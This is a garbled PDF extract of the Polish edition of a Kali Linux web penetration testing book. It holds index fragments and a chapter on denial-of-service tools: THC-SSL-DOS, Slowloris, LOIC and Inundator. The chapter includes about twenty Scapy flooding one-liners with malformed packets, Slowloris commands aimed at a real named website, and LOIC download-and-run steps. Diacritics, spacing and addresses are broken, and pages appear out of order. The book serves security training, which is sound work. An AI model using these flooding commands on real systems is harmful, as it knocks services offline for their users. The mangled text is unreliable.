spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 34: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

